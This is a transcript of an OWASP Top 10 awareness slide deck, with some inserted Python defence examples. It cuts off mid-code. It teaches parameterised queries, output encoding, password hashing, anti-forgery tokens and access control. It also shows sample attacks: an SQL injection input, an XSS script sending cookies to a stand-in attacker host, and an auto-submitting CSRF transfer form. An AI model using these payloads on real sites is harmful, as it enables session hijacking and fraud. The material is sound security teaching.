
Application Security around OWASP Top 10

Feb 18, 2017

Sastry Tumuluri
Transcript
Page 1: Application Security around OWASP Top 10

Many thanks (content & inspiration) to: Jim Manico, Eoin Keary & Troy Hunt

Page 2: Application Security around OWASP Top 10

WARNING

This is an awareness document.

There are more than 10 issues.

You cannot secure an application based on a top ten list.

Page 3: Application Security around OWASP Top 10

OWASP Top 10 - 2013

Page 4: Application Security around OWASP Top 10

[1]

';

Page 5: Application Security around OWASP Top 10

$NEW_EMAIL = Request['new_email'];

update users set email='$NEW_EMAIL' where id=132005;

SQL Injection

Page 6: Application Security around OWASP Top 10

1. WHAT IF: $NEW_EMAIL = ';

2. update users set email='$NEW_EMAIL' where id=132005;

3. update users set email=''; --' where id=132005;

SQL Injection

Page 7: Application Security around OWASP Top 10

$stmt = $dbh->prepare("update users set email=:new_email where id=:user_id");

$stmt->bindParam(':new_email', $email);

$stmt->bindParam(':user_id', $id);

$stmt->execute();

Query Parameterization (PHP PDO)

Page 8: Application Security around OWASP Top 10

SqlConnection objConnection = new SqlConnection(_ConnectionString);
objConnection.Open();
SqlCommand objCommand = new SqlCommand(
    "SELECT * FROM User WHERE Name = @Name AND Password = @Password", objConnection);
objCommand.Parameters.Add("@Name", NameTextBox.Text);
objCommand.Parameters.Add("@Password", PassTextBox.Text);
SqlDataReader objReader = objCommand.ExecuteReader();

Query Parameterization (.NET)

Page 9: Application Security around OWASP Top 10

String newName = request.getParameter("newName");
String id = request.getParameter("id");

// SQL
PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?");
pstmt.setString(1, newName);
pstmt.setString(2, id);

// HQL
Query safeHQLQuery = session.createQuery("from Employees where id=:empId");
safeHQLQuery.setParameter("empId", id);

Query Parameterization (Java)

Page 10: Application Security around OWASP Top 10

# Create
Project.create!(:name => 'owasp')

# Read
Project.all(:conditions => "name = ?", name)
Project.all(:conditions => { :name => name })
Project.where("name = :name", :name => name)
Project.where(:id => params[:id]).all

# Update
Project.update_attributes(:name => 'owasp')

Query Parameterization Failure (RoR)

Page 11: Application Security around OWASP Top 10

OWASP Top 10 - 2013

Page 12: Application Security around OWASP Top 10

Disable Browser Autocomplete

<form AUTOCOMPLETE="off">
<input AUTOCOMPLETE="off">

Only send passwords over HTTPS POST

Do not display passwords in browser: input type=password

Store password based on need

Use a salt (de-duplication)

SCRYPT/PBKDF2 (slow, performance hit, easy)

HMAC (requires good key storage, tough)

[2] Password Defenses

Page 13: Application Security around OWASP Top 10

1) Do not limit the type of characters or length* of user password

– Limiting passwords to protect against injection is doomed to failure

– Use proper encoder and other defenses described instead

Password Storage

Page 14: Application Security around OWASP Top 10

2) Use a cryptographically strong credential-specific salt

– Protect ([salt] + [password]);

– Use a 32 char / 64 char salt (may depend on protection function)

– Do not depend on hiding / splitting / otherwise obscuring the salt

Password Storage

Page 15: Application Security around OWASP Top 10

3) Impose difficult verification on attacker ONLY

– HMAC-SHA256 ([private key], [salt] + [password])

– Protect the key as any private key

– Store key outside the credential store (

– Improvement over (solely) salted schemes; relies on proper key creation & management

Password Storage

Page 16: Application Security around OWASP Top 10

4) Impose difficult verification on both (impacts attacker more than defender)

– pbkdf2([salt] + [password], c=10,000,000);

– PBKDF2 when FIPS certification or enterprise support on many platforms required

– Scrypt when resisting hardware accelerated attacks is more important

Password Storage
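The four password-storage steps above, carried through as an added Python example (mine, not the deck's): a per-credential random salt, the keyed HMAC-SHA256 variant of step 3 and the PBKDF2 variant of step 4, with constant-time verification. The iteration count, the salt length and load_server_key are assumptions made for the demo.

```python
import hashlib
import hmac
import os

# Constructed parameters for this example. The deck suggests c=10,000,000 for
# PBKDF2; 200,000 keeps the demo quick. Tune the count so that one verification
# costs a noticeable fraction of a second on your production hardware.
PBKDF2_ITERATIONS = 200_000
SALT_BYTES = 32  # 64 hex characters once stored


def load_server_key():
    """Step 3's private key. Hypothetical: a real deployment reads it from an
    HSM, KMS or config outside the credential store, never from the user table."""
    return bytes.fromhex("0f" * 32)  # constructed, fixed so the demo is repeatable


def protect(password, salt, scheme, key=b""):
    """Derive the stored verifier for one (salt, password) pair."""
    pwd = password.encode("utf-8")  # any character, any length: no truncation
    if scheme == "pbkdf2-sha256":
        # Step 4: slow for everyone, but the attacker pays it per guess per salt.
        return hashlib.pbkdf2_hmac("sha256", pwd, salt, PBKDF2_ITERATIONS)
    if scheme == "hmac-sha256":
        # Step 3: HMAC-SHA256([private key], [salt] + [password]); cheap for the
        # defender, useless to an attacker who has the table but not the key.
        if not key:
            raise ValueError("hmac-sha256 scheme requires the server key")
        return hmac.new(key, salt + pwd, hashlib.sha256).digest()
    raise ValueError("unknown scheme: %s" % scheme)


def hash_password(password, scheme="pbkdf2-sha256", key=b""):
    """Return the record to store with the credential: scheme, salt and verifier."""
    salt = os.urandom(SALT_BYTES)  # step 2: cryptographically strong, per credential
    return {
        "scheme": scheme,
        "salt": salt.hex(),
        "hash": protect(password, salt, scheme, key).hex(),
    }


def verify_password(password, record, key=b""):
    """Recompute with the stored salt and compare in constant time."""
    try:
        expected = bytes.fromhex(record["hash"])
        actual = protect(password, bytes.fromhex(record["salt"]), record["scheme"], key)
    except (KeyError, ValueError):
        return False
    return hmac.compare_digest(actual, expected)
```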

Page 17: Application Security around OWASP Top 10

Basic MFA Considerations

• Where do you send the token?

– Email (worst – yet, better than none!)

– SMS (ok)

– Mobile native app (good)

– Dedicated token (great)

– Printed Tokens (interesting)

• How do you handle thick clients?

– Email services, for example

– Dedicated and strong per-app passwords

Page 18: Application Security around OWASP Top 10

Basic MFA Considerations

• How do you handle unavailable MFA devices?

– Printed back-up codes

– Fallback mechanism (like email)

– Call-in center

• How do you handle mobile apps?

– When is MFA not useful in mobile app scenarios?

Page 19: Application Security around OWASP Top 10

“Forgot Password” design

Require identity questions: last name, account number, email, DOB. Enforce lockout policy.

Ask one or more good security questions: https://www.owasp.org/index.php/Choosing_and_Using_Security_Questions_Cheat_Sheet

Send the user a randomly generated token via out-of-band email, SMS or hardware / software token generator

Verify code in same web session. Enforce lockout policy.

Change password. Enforce password policy.

Page 20: Application Security around OWASP Top 10

OWASP Top 10 - 2013

Page 21: Application Security around OWASP Top 10

[3] Cross Site Scripting (XSS)

Page 22: Application Security around OWASP Top 10

<script>
var badURL = 'https://evileviljim.com/somesite/data=' + document.cookie;
var img = new Image();
img.src = badURL;
</script>

<script>document.body.innerHTML='<blink>CYBER IS COOL</blink>';</script>

Anatomy of an XSS Attack

Page 23: Application Security around OWASP Top 10

Impact of XSS

– Session Hijacking

– Site Defacement

– Network Scanning

– Undermining CSRF Defenses

– Site Redirection/Phishing

– Load of Remotely Hosted Scripts

– Data Theft

– Keystroke Logging

– Attackers using XSS more frequently

Page 24: Application Security around OWASP Top 10

XSS Prevention (.NET)

• WebForms/WebForms View Engine: <%=Server.HtmlEncode(data)%>

• WebForms v4.0+: <%: data %>

• MVC3+ Razor View Engine: @data

• Data Binding in Web Forms v4 and below: <%#Server.HtmlEncode(Eval("property"))%>

• Data Binding in v4.5: <%#: Item.Property %>

• Better: ASP.Net 3.5 and below use AntiXss library directly: Microsoft.Security.Application.Encoder.HtmlEncode(message)

Page 25: Application Security around OWASP Top 10

XSS Prevention (.NET)

• ASP.Net 4 (WebForms and MVC): <httpRuntime encoderType="Microsoft.Security.Application.AntiXssEncoder, AntiXssLibrary"/>

• ASP.Net 4.5 (AntiXss included in this version!): <httpRuntime encoderType="System.Web.Security.AntiXss.AntiXssEncoder, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"/>

• JSON (MVC): Json.Encode(Model)

• Javascript encoding using AntiXssEncoder.JavaScriptEncode(Model.FirstName)

Page 26: Application Security around OWASP Top 10

<

Page 27: Application Security around OWASP Top 10

&lt;

Page 28: Application Security around OWASP Top 10

• No third party libraries or configuration necessary

• This code was designed for high-availability/high-performance encoding functionality

• Simple drop-in encoding functionality

• Performance, ESAPI integration

• More complete API (uri and uri component encoding, etc) in some regards

• Java 1.5+

• Last updated January 30, 2014 (version 1.1.1)

https://www.owasp.org/index.php/OWASP_Java_Encoder_Project

OWASP Java Encoder Project

Page 29: Application Security around OWASP Top 10

Web Page built in Java JSP is vulnerable to XSS

OWASP Java Encoder Project

Problem

Solution

1) <input type="text" name="data" value="<%= Encode.forHtmlAttribute(dataValue) %>" />

2) <textarea name="text"><%= Encode.forHtmlContent(textValue) %></textarea>

3) <button onclick="alert('<%= Encode.forJavaScriptAttribute(alertMsg) %>');">click me</button>

4) <script type="text/javascript">var msg = "<%= Encode.forJavaScriptBlock(message) %>"; alert(msg);</script>

Page 30: Application Security around OWASP Top 10

HTML Contexts: Encode#forHtmlContent(String), Encode#forHtmlAttribute(String), Encode#forHtmlUnquotedAttribute(String)

XML Contexts: Encode#forXml(String), Encode#forXmlContent(String), Encode#forXmlAttribute(String), Encode#forXmlComment(String), Encode#forCDATA(String)

CSS Contexts: Encode#forCssString(String), Encode#forCssUrl(String)

JavaScript Contexts: Encode#forJavaScript(String), Encode#forJavaScriptAttribute(String), Encode#forJavaScriptBlock(String), Encode#forJavaScriptSource(String)

URI/URL contexts: Encode#forUri(String), Encode#forUriComponent(String)

OWASP Java Encoder Project
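As an added example for the two slides above (my Python, not the OWASP Java Encoder itself), the functions below mirror three of the listed contexts and render the JSP snippets from the previous slide, to show that the encoder has to match the output context. The safe character set and the escape format are this example's own choices, modelled on the Java Encoder's behaviour.

```python
import html

# Characters the JavaScript-string encoder passes through unchanged (this
# example's own safe set, modelled on the OWASP Java Encoder's behaviour).
_JS_SAFE = set("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 ,._")


def for_html_content(s):
    """Text between tags, e.g. inside <textarea>...</textarea> (forHtmlContent)."""
    return html.escape(s, quote=True)


def for_html_attribute(s):
    """Value of a quoted attribute, e.g. value="..." (forHtmlAttribute). Encoding
    the quotes is what stops the value from closing early and adding attributes."""
    return html.escape(s, quote=True)


def for_javascript_string(s):
    """Inside a quoted JavaScript string literal in a <script> block
    (forJavaScriptBlock). Every character outside the safe set becomes \\xHH or
    \\uHHHH, so quotes, backslashes, '<' and '/' cannot end the string or the
    <script> element; astral characters become UTF-16 surrogate pairs."""
    out = []
    for ch in s:
        if ch in _JS_SAFE:
            out.append(ch)
        elif ord(ch) < 0x100:
            out.append("\\x%02X" % ord(ch))
        else:
            units = ch.encode("utf-16-be")
            for i in range(0, len(units), 2):
                out.append("\\u%02X%02X" % (units[i], units[i + 1]))
    return "".join(out)


def render_input(data_value):
    """Slide example 1: quoted attribute context."""
    return '<input type="text" name="data" value="%s" />' % for_html_attribute(data_value)


def render_textarea(text_value):
    """Slide example 2: HTML content context."""
    return '<textarea name="text">%s</textarea>' % for_html_content(text_value)


def render_alert_script(message):
    """Slide example 4: a string literal inside a script block. HTML encoding
    would be the wrong tool here: it leaves the backslash alone, so a value
    ending in '\\' would escape the closing quote of the literal."""
    return '<script type="text/javascript">var msg = "%s"; alert(msg);</script>' % for_javascript_string(message)
```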

Page 31: Application Security around OWASP Top 10

<script src="/my-server-side-generated-script"></script>

class MyServerSideGeneratedScript extends HttpServlet {
    protected void doGet(HttpServletRequest request, HttpServletResponse response) throws IOException {
        String theTextToAlert = request.getParameter("text"); // hypothetical source of the untrusted text
        response.setContentType("text/javascript; charset=UTF-8");
        PrintWriter w = response.getWriter();
        w.println("function() {");
        // forJavaScriptSource: encoding for a stand-alone .js response, not for a <script> block inside HTML
        w.println("  alert('" + Encode.forJavaScriptSource(theTextToAlert) + "');");
        w.println("}");
    }
}

OWASP Java Encoder Project

Page 32: Application Security around OWASP Top 10

Other Encoding Libraries

• Ruby on Rails – http://api.rubyonrails.org/classes/ERB/Util.html

• Reform Project – Java, .NET v1/v2, PHP, Python, Perl, JavaScript, Classic ASP – https://www.owasp.org/index.php/Category:OWASP_Encoding_Project

• ESAPI – PHP, .NET, Python, Classic ASP, Cold Fusion – https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API

• .NET AntiXSS Library – http://wpl.codeplex.com/releases/view/80289

Page 33: Application Security around OWASP Top 10

• Written in Java; lets you include HTML authored by third-parties in your web application while protecting against XSS

• Has an extensive test suite, and has undergone adversarial security review: https://code.google.com/p/owasp-java-html-sanitizer/wiki/AttackReviewGroundRules

• Very easy to use

• Allows for simple programmatic POSITIVE policy configuration. No XML config.

• Derived from the Caja project (Google); high performance & low memory utilization

OWASP HTML Sanitizer Project – https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project

Page 34: Application Security around OWASP Top 10

Web Page is vulnerable to XSS because of untrusted HTML

PolicyFactory policy = new HtmlPolicyBuilder()
    .allowElements("a")
    .allowUrlProtocols("https")
    .allowAttributes("href").onElements("a")
    .requireRelNofollowOnLinks()
    .build();
String safeHTML = policy.sanitize(untrustedHTML);

Solving real world problems (using OWASP HTML Sanitizer)

Problem

Solution

Page 35: Application Security around OWASP Top 10

• Pure JavaScript – http://code.google.com/p/google-caja/wiki/JsHtmlSanitizer

• Python – https://pypi.python.org/pypi/bleach

• PHP – http://htmlpurifier.org/ – http://www.bioinformatics.org/phplabware/internal_utilities/htmLawed/

• .NET – AntiXSS.getSafeHTML/getSafeHTMLFragment – http://htmlagilitypack.codeplex.com/

• Ruby on Rails – http://api.rubyonrails.org/classes/HTML.html

Other HTML Sanitizers

Page 36: Application Security around OWASP Top 10

• JavaScript encode and delimit untrusted data as quoted strings

• Avoid use of HTML rendering methods like innerHTML

– If you must do this, then sanitize untrusted HTML first

• Avoid code execution contexts

– eval(), setTimeout() or event handlers

• When possible, treat untrusted data as display text only

• To build dynamic interfaces, use document.createElement("…"), element.setAttribute("…", "value"), element.appendChild(…)

• Parse JSON with JSON.parse in the browser

DOM-based XSS Defense

Page 37: Application Security around OWASP Top 10

SAFE use of JQuery

$('#element').text(UNTRUSTED DATA);

UNSAFE use of JQuery

$('#element').html(UNTRUSTED DATA);

Page 38: Application Security around OWASP Top 10

OWASP Top 10 - 2013

Page 39: Application Security around OWASP Top 10

[4] Insecure Direct Object Reference

Page 40: Application Security around OWASP Top 10

Using Fiddler an attacker can change the id and access more information

Insecure Direct Object Reference

Page 41: Application Security around OWASP Top 10

We need to change the method signature (the ID is now a GUID), then translate it back to the original, direct reference before going any further:

public Customer GetCustomer(Guid indirectId)
{
    var customerId = IndirectReferenceMap.GetDirectReference(indirectId);
    // ... continue with the direct customerId
}

Insecure Direct Object Reference
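The indirect-reference map behind the GetCustomer change above, as an added Python example (mine, not the deck's C#): each session gets random GUIDs for the records it was shown, and only those GUIDs resolve back to direct ids. The customer table, the usernames and the ownership check are constructed for the demo.

```python
import uuid


class IndirectReferenceMap:
    """Per-session map between random GUIDs handed to the client and the real
    record ids kept server-side (the deck's IndirectReferenceMap idea)."""

    def __init__(self):
        self._to_direct = {}
        self._to_indirect = {}

    def get_indirect_reference(self, direct_id):
        """Call this when rendering a link or form field for a record the
        current user is allowed to see. Reuses the GUID if one was issued."""
        if direct_id not in self._to_indirect:
            indirect_id = str(uuid.uuid4())  # 122 random bits: not enumerable
            self._to_indirect[direct_id] = indirect_id
            self._to_direct[indirect_id] = direct_id
        return self._to_indirect[direct_id]

    def get_direct_reference(self, indirect_id):
        """Translate back. Only references this session issued resolve, so a
        GUID edited in a proxy (or copied from another user) fails here."""
        return self._to_direct.get(indirect_id)


# Constructed sample data: a hypothetical customer table with an owner per row.
CUSTOMERS = {
    132005: {"name": "A. Customer", "owner": "alice"},
    132006: {"name": "B. Customer", "owner": "bob"},
}


def render_customer_links(session_map, username):
    """Page for one user: issue indirect ids only for records they own."""
    return {session_map.get_indirect_reference(cid): c["name"]
            for cid, c in CUSTOMERS.items() if c["owner"] == username}


def get_customer(session_map, username, indirect_id):
    """The deck's GetCustomer: translate, then still enforce ownership."""
    customer_id = session_map.get_direct_reference(indirect_id)
    if customer_id is None:
        return None  # unknown or foreign reference: treat as not found
    customer = CUSTOMERS.get(customer_id)
    if customer is None or customer["owner"] != username:
        return None  # defence in depth: the map is not the only check
    return customer
```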

Page 42: Application Security around OWASP Top 10

OWASP Top 10 - 2013

Page 43: Application Security around OWASP Top 10

[5] Security Misconfiguration

Is it really the developers' work? Or the sysadmins?

If the developers don't know, how will the application security design be complete?

What about configuring in Dev & Testing environments?

Page 44: Application Security around OWASP Top 10

• Harden the Operating System

– BIOS & grub passwords; secure physical access

– Use multiple partitions (not default install); use options like ro, nosuid, noexec, nodev, --make-runbindable ...

– Remove all unnecessary packages & drivers (e.g., do you really need Xorg? All those fonts?)

– Lockdown others (cron, USB detect, IPv6, ctrl-alt-del, ...)

– SSH password-less login with SSH keygen

– Enable ufw / iptables / … and a HIDS >> turn on remote logging

– Oh yeah, regular patches & updates (wait!)

– Regular backups!

Hardening the servers (general)

Page 45: Application Security around OWASP Top 10

• Run Tomcat under a Security Manager

– http://tomcat.apache.org/tomcat-6.0-doc/security-manager-howto.html

– Modify $CATALINA_BASE/conf/catalina.policy: PropertyPermission, RuntimePermission, FilePermission, SocketPermission, NetPermission, ReflectPermission, …

– Configure package access (careful! test & debug!): $CATALINA_BASE/conf/catalina.properties

– Restart Tomcat:

$CATALINA_HOME/bin/catalina.sh start -security (Unix)

%CATALINA_HOME%\bin\catalina start -security (Windows)

Secure Config Tips (Tomcat)

Page 46: Application Security around OWASP Top 10

• More tips – http://www.tomcatexpert.com/blog/2011/11/02/best-practices-securing-apache-tomcat-7

– Use Security LifeCycle Listener

– Lockdown connector interfaces

– Disable shutdown port?

– Secure your Web Manager

– Configure AccessLogValve and RemoteAddrValve

Secure Config Tips (Tomcat)

Page 47: Application Security around OWASP Top 10

• Similar principles as Tomcat

– Use the Java Security Manager

– Configure policies and access permissions

– Use Security Realms

– Disable remote access to JMX

– Configure TLS (SSL?) carefully: remove old protos, weak crypto, renego, legacy support, etc.

– Secure the Management interfaces (disable HTTP mgmt?)

– ...

Secure Config Tips (JBOSS)

Page 48: Application Security around OWASP Top 10

5 things to remember here:

• Error Handling (Enable Custom Errors)

• Disable TRACE

Securing web.config

Page 49: Application Security around OWASP Top 10

• Disable Debugging

• HTTP Only cookies

Securing web.config

Page 50: Application Security around OWASP Top 10

• Session State- UseCookies

Securing web.config

Page 51: Application Security around OWASP Top 10

• Steps:

– Go to "C:\Windows\Microsoft.NET\Framework\v4.0.30319" using command prompt.

aspnet_regiis.exe -pe "connectionStrings" "<path of Web.Config>"

• Decrypting the web.config

– Go to the same path

aspnet_regiis.exe -pd "connectionStrings" "<path of Web.Config>"

Encrypting web.config

Page 52: Application Security around OWASP Top 10

• Before Encrypting

References

http://www.owasp.org

http://www.codeproject.com/Tips/795135/Encrypt-ConnectionString-in-Web-Config

Page 53: Application Security around OWASP Top 10

• After Encrypting

Page 54: Application Security around OWASP Top 10

OWASP Top 10 - 2013

Page 55: Application Security around OWASP Top 10

[6] Sensitive Data Exposure

Page 56: Application Security around OWASP Top 10

[8]

<img src="https://google.com/logo.png">

<img src="https://google.com/deleteMail/7/confirm=true">

<form method="POST" action="https://mybank.com/transfer">
<input type="hidden" name="account" value="23532632"/>
<input type="hidden" name="amount" value="1000"/>
</form>
<script>document.forms[0].submit()</script>

Cross Site Request Forgery

Page 57: Application Security around OWASP Top 10

How many are already “logged in”? Waiting to update your status, accept your credit card or email your friends. What if another tab manages to send a request?

What about others with the “remember me” checkbox? No need for tab to be open... just send a request and they'll happily accept!

How many tabs on your browser?

Page 58: Application Security around OWASP Top 10


Page 59: Application Security around OWASP Top 10

Using Fiddler we get the JSON

Page 60: Application Security around OWASP Top 10


Page 61: Application Security around OWASP Top 10


Page 62: Application Security around OWASP Top 10

To add the anti-forgery tokens to a Razor page, use the HtmlHelper.AntiForgeryToken helper method:

@using (Html.BeginForm("Manage", "Account")) {
    @Html.AntiForgeryToken()
}

This method adds the hidden form field and also sets the cookie token.

<script>
@functions {
    public string TokenHeaderValue() {
        string cookieToken, formToken;
        AntiForgery.GetTokens(null, out cookieToken, out formToken);
        return cookieToken + ":" + formToken;
    }
}
$.ajax("api/values", {
    type: "post",
    contentType: "application/json",
    data: { }, // JSON data goes here
    dataType: "json",
    headers: { 'RequestVerificationToken': '@TokenHeaderValue()' }
});
</script>

Anti-Forgery Tokens

Page 63: Application Security around OWASP Top 10

void ValidateRequestHeader(HttpRequestMessage request)
{
    string cookieToken = "";
    string formToken = "";
    IEnumerable<string> tokenHeaders;
    if (request.Headers.TryGetValues("RequestVerificationToken", out tokenHeaders))
    {
        string[] tokens = tokenHeaders.First().Split(':');
        if (tokens.Length == 2)
        {
            cookieToken = tokens[0].Trim();
            formToken = tokens[1].Trim();
        }
    }
    AntiForgery.Validate(cookieToken, formToken);
}
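The token pair and header handling from the two slides above, as an added Python model (mine, not the ASP.NET AntiForgery implementation): the form token is an HMAC over the cookie token and the logged-in user, the header carries "cookieToken:formToken" as built by TokenHeaderValue(), and the server also compares the header's cookie half against the cookie the browser actually sent. The server key and the cookie name are assumptions for the demo.

```python
import hashlib
import hmac
import secrets

COOKIE_NAME = "__RequestVerificationToken"  # assumed cookie name for the demo


class AntiForgery:
    """Issues and validates a cookie token / form token pair. The form token is
    an HMAC over the cookie token and the username, so the two halves must come
    from the same issuance for the same user."""

    def __init__(self, server_key):
        self._key = server_key  # hypothetical: loaded from server-side config

    def _derive(self, cookie_token, username):
        msg = ("%s|%s" % (cookie_token, username)).encode("utf-8")
        return hmac.new(self._key, msg, hashlib.sha256).hexdigest()

    def get_tokens(self, username):
        """Equivalent of AntiForgery.GetTokens: the first value goes into the
        cookie, the second into the hidden field or the request header."""
        cookie_token = secrets.token_hex(16)
        return cookie_token, self._derive(cookie_token, username)

    def validate(self, cookie_token, form_token, username):
        """Equivalent of AntiForgery.Validate, with a constant-time comparison."""
        if not cookie_token or not form_token:
            return False
        return hmac.compare_digest(self._derive(cookie_token, username), form_token)


def parse_token_header(value):
    """The 'cookieToken:formToken' format built by the deck's TokenHeaderValue()."""
    tokens = value.split(":")
    if len(tokens) != 2:
        return "", ""
    return tokens[0].strip(), tokens[1].strip()


def validate_request(af, username, headers, cookies):
    """Server side of the $.ajax call. The header must parse, its cookie half
    must equal the cookie the browser actually sent (a cross-site page cannot
    read that cookie, so it cannot build a matching header), and the pair must
    validate for the currently logged-in user."""
    cookie_token, form_token = parse_token_header(headers.get("RequestVerificationToken", ""))
    actual_cookie = cookies.get(COOKIE_NAME, "")
    if not cookie_token or not hmac.compare_digest(cookie_token.encode("utf-8"), actual_cookie.encode("utf-8")):
        return False
    return af.validate(cookie_token, form_token, username)
```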

Page 64: Application Security around OWASP Top 10

OWASP Top 10 - 2013

Page 65: Application Security around OWASP Top 10

if ((user.isManager() || user.isAdministrator() || user.isEditor()) && (user.id() != 1132)) {
    // execute action
}

How do you change the policy of this code?

[7] Access Control

Page 66: Application Security around OWASP Top 10

• Authorization: The process where a system determines whether a specific user has access to a resource

• Permission: Represents app behavior only

• Entitlement: What a user is actually allowed to do

• Principal/User: Who/what you are entitling

• Implicit Role: Named permission, user associated – if (user.isRole("Manager")) { ... }

• Explicit Role: Named permission, resource associated – if (user.isAuthorized("report:view:3324")) { ... }

What is Access Control

Page 67: Application Security around OWASP Top 10

• Hard-coded role checks in application code

• Lack of centralized access control logic

• Untrusted data driving access control decisions

• Access control that is “open by default”

• Lack of addressing horizontal access control in a standardized way (if at all)

• Access control logic that needs to be manually added to every endpoint in code

• Access Control that is “sticky” per session

• Access Control that requires per-user policy

Access Control DON'Ts

Page 68: Application Security around OWASP Top 10

• Vertical Access Control Attacks – A standard user accessing administration functionality

• Horizontal Access Control Attacks – Same role, but accessing another user's private data

• Business Logic Access Control Attacks – Abuse of one or more linked activities that collectively realize a business objective

Attacks on Access Control

Page 69: Application Security around OWASP Top 10

• Loss of accountability

– Attackers maliciously execute actions as other users

– Attackers maliciously execute higher level actions

• Disclosure of confidential data

– Compromising admin-level accounts often results in access to user's confidential data

• Data tampering

– Privilege levels do not distinguish users who can only view data and users permitted to modify data

Impact of poor Access Control

Page 70: Application Security around OWASP Top 10

• Apache Shiro is a powerful and easy to use Java security framework

• Offers developers an intuitive yet comprehensive solution to authentication, authorization, cryptography, and session management

• Built on sound interface-driven design and OO principles

• Enables custom behavior

• Sensible and secure defaults for everything

Apache SHIRO

http://shiro.apache.org/

Page 71: Application Security around OWASP Top 10

Web Application needs secure access control mechanism

if (currentUser.isPermitted("lightsaber:wield")) {
    log.info("You may use a lightsaber ring. Use it wisely.");
} else {
    log.info("Sorry, lightsaber rings are for schwartz masters only.");
}

Problem

Solution

Solving real world Access Control problems

Page 72: Application Security around OWASP Top 10

int winnebagoId = request.getInt("winnebago_id");

if (currentUser.isPermitted("winnebago:drive:" + winnebagoId)) {
    log.info("You are permitted to 'drive' the 'winnebago'. Here are the keys.");
} else {
    log.info("Sorry, you aren't allowed to drive this winnebago!");
}

Solving real world Access Control problems

Web Application needs secure access to a specific object

Problem

Solution
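The wildcard permission matching behind the two isPermitted calls above, re-implemented as an added Python example (mine, not Shiro's code) so the "lightsaber:wield" and "winnebago:drive:<id>" checks can be tried against a user's granted permissions. The Subject class and the granted permission strings are constructed stand-ins for Shiro's currentUser and its realm.

```python
WILDCARD = "*"


class WildcardPermission:
    """'domain:action:instance' permission strings as Shiro interprets them:
    parts are separated by ':', a part may list several values separated by ',',
    comparison is case-insensitive and '*' matches anything."""

    def __init__(self, text):
        text = text.strip()
        if not text:
            raise ValueError("permission string must not be empty")
        self.parts = []
        for part in text.split(":"):
            values = {v.strip().lower() for v in part.split(",") if v.strip()}
            if not values:
                raise ValueError("permission part must not be empty: %r" % text)
            self.parts.append(values)

    def implies(self, other):
        """Does this (granted) permission cover the requested one?"""
        for i, requested in enumerate(other.parts):
            if i >= len(self.parts):
                # 'winnebago:drive' implies 'winnebago:drive:123' (any instance)
                return True
            granted = self.parts[i]
            if WILDCARD not in granted and not requested <= granted:
                return False
        # 'winnebago:drive:123' must NOT imply the broader 'winnebago:drive'
        return all(WILDCARD in granted for granted in self.parts[len(other.parts):])


class Subject:
    """Minimal stand-in for Shiro's currentUser: the granted permission strings
    would normally come from the user's roles in a realm (constructed here)."""

    def __init__(self, granted):
        self._granted = [WildcardPermission(p) for p in granted]

    def is_permitted(self, permission):
        requested = WildcardPermission(permission)
        return any(g.implies(requested) for g in self._granted)


def may_drive_winnebago(current_user, winnebago_id):
    """The deck's instance-level check: the id from the request becomes part of
    the permission string, so horizontal access control falls out of the same call."""
    return current_user.is_permitted("winnebago:drive:%d" % winnebago_id)
```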

Page 73: Application Security around OWASP Top 10

“GET” exposes sensitive authentication information in the URL: in Web Server and Proxy Server logs, in the HTTP Referer header, in Bookmarks/Favorites often emailed to others

“POST” places information in the body of the request and not the URL

Enforce HTTPS POST For Sensitive Data Transport

[E1] HTTP: POST vs GET

Page 74: Application Security around OWASP Top 10

» X-Frame-Options
» X-XSS-Protection
» X-Content-Type-Options
» Content Security Policy
» Access-Control-Allow-Origin
» HTTPS Strict Transport Security
» Cache-Control / Pragma

HTTP Response Headers (security related)

Page 75: Application Security around OWASP Top 10

Protects you from most classes of Clickjacking

X-Frame-Options: DENY
X-Frame-Options: SAMEORIGIN
X-Frame-Options: ALLOW-FROM uri

X-Frame-Options

Page 76: Application Security around OWASP Top 10

X-XSS-Protection

Use the browser’s built in XSS Auditor

X-XSS-Protection: [0-1](; mode=block)?

X-XSS-Protection: 1; mode=block

Page 77: Application Security around OWASP Top 10

Fixes mime sniffing attacks

Only applies to IE

X-Content-Type-Options: nosniff

X-Content-Type-Options

Page 78: Application Security around OWASP Top 10

• Anti-XSS W3C standard http://www.w3.org/TR/CSP/

• Move all inline script and style into external files

• Add the X-Content-Security-Policy response header to instruct the browser that CSP is in use

• Define a policy for the site regarding loading of content

• Chrome version 25 and later (50%)

• Firefox version 23 and later (30%)

• Internet Explorer version 10 and later (10%)

Content Security Policy

Page 79: Application Security around OWASP Top 10

Add the following as part of your HTTP Response

Cache-Control: no-store, no-cache, must-revalidate
Expires: -1

Disabling the browser cache

Page 80: Application Security around OWASP Top 10

[E2] Application Layer Intrusion Detection

• Great detection points to start with

– Input validation failure server side when client side validation exists

– Input validation failure server side on non-user editable parameters (hidden fields, checkboxes, radio buttons or select lists)

– Forced browsing to common attack entry points e.g., /admin/secretlogin.jsp or honeypot URL (a fake path listed in /robots.txt)

Page 81: Application Security around OWASP Top 10

Application Layer Intrusion Detection

• Others

– Blatant SQLi or XSS injection attacks

– Workflow sequence abuse (e.g. multi-part form in wrong order)

– Custom business logic (e.g. basket vs catalogue price mismatch)
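The detection points from the two slides above, wired into a small AppSensor-style event counter as an added Python example (mine, not the OWASP AppSensor code): a honeypot path, a non-editable field submitted with a value outside its list, a checkout step taken out of order, and a basket price that disagrees with the catalogue. The detection-point names, thresholds, paths, flow and prices are constructed for the demo.

```python
from collections import defaultdict

# Constructed detection-point identifiers and reference data for the demo
# (AppSensor's own catalogue uses codes such as RE/IE/ACE; these names are ours).
HONEYPOT_PATHS = {"/admin/secretlogin.jsp"}          # fake path advertised in robots.txt
NON_EDITABLE_FIELDS = {"plan": {"free", "pro"}}       # hidden field / select list values
CHECKOUT_FLOW = ["cart", "address", "payment", "confirm"]
CATALOGUE_PRICES = {"sku-1": 1999, "sku-2": 500}      # cents, constructed

# Events per user tolerated before the response escalates beyond logging.
THRESHOLDS = {"forced_browsing": 1, "non_editable_param": 3,
              "workflow_abuse": 2, "price_mismatch": 1}
RESPONSES = ["log", "warn_user", "end_session", "lock_account"]


class AppSensor:
    """Counts detection-point events per user and returns the response to apply;
    each event past the threshold escalates one step further."""

    def __init__(self):
        self._counts = defaultdict(int)

    def record(self, user, point):
        self._counts[(user, point)] += 1
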